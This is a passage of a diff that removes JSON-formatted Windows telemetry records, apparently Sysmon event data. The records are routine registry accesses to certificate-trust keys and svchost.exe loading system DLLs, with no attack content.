- "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"image_load", - "image_name": "iertutil.dll", - "image_path": "C:\\Windows\\System32\\iertutil.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - 
"timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880580000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "sxs.dll", - "image_path": "C:\\Windows\\System32\\sxs.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "AppXDeploymentClient.dll", - "image_path": "C:\\Windows\\System32\\AppXDeploymentClient.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", 
- "registry_value": "CRLs", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880900000, - "unique_pid": 